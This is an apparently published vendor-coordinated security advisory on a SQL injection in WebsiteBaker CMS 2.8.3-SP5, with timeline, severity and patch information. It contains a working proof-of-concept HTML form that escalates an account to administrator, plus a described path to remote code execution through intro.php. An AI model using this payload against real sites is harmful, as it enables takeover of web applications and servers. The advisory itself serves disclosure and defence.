Advisory ID: HTB23296
Product: WebsiteBaker
Vendor: WebsiteBaker Org e.V.
Vulnerable Version(s): 2.8.3-SP5 and probably prior
Tested Version: 2.8.3-SP5
Advisory Publication:  February 24, 2016  [without technical details]
Vendor Notification: February 24, 2016 
Vendor Patch: February 26, 2016 
Public Disclosure: March 18, 2016 
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: Critical 
CVSSv3 Base Score: 10 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in WebsiteBaker CMS. A remote attacker will be able to read, write or modify arbitrary information in the database, gain complete control over the vulnerable web application and even the entire web server on which the application is hosted.

The vulnerability exists due to insufficient filtration of user-supplied data passed via "language" HTTP POST parameter to "/account/preferences.php" PHP script. A remote authenticated attacker (the registration is open by default) can alter present SQL query, inject and execute arbitrary SQL commands in the application’s database. 

Successful exploitation of vulnerability requires that the attacker is registered and authenticated, but the registration is open by default.

The following exploit code will assign administrative privileges to attacker’s account. To reproduce the vulnerability, just login to the website, copy-paste the code below into an empty HTML file and then open it in your browser:


<form action="http://[host]/account/preferences.php" method="post" name="f1">
<input type="hidden" name="display_name" value="username">
<input type="hidden" name="language" value="EN',group_id='1',groups_id='1">
<input type="hidden" name="action" value="details">
<input value="submit" id="btn" type="submit" />
</form><script>document.f1.submit();</script>


We also attract your attention, that website administrator can edit the "intro.php" file and inject arbitrary PHP code into it using the following URL: 

http://[host]/admin/pages/intro.php

The injected code will be executed every time the user visits the following page:

http://[host]/pages/intro.php

Giving these circumstances, successful exploitation of SQL injection vulnerability will lead to Remote Code Execution and full compromise not just of the website, but of the entire web server and related environment. 


-----------------------------------------------------------------------------------------------

Solution:

Update to WebsiteBaker 2.8.3 SP6 RC3.0

More Information:
http://addon.websitebaker.org/pages/en/browse-add-ons.php?id=06C9F242

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23296 - https://www.htbridge.com/advisory/HTB23296  - SQL Injection and RCE in WebsiteBaker
[2] WebsiteBaker - http://websitebaker.org - WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS).
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.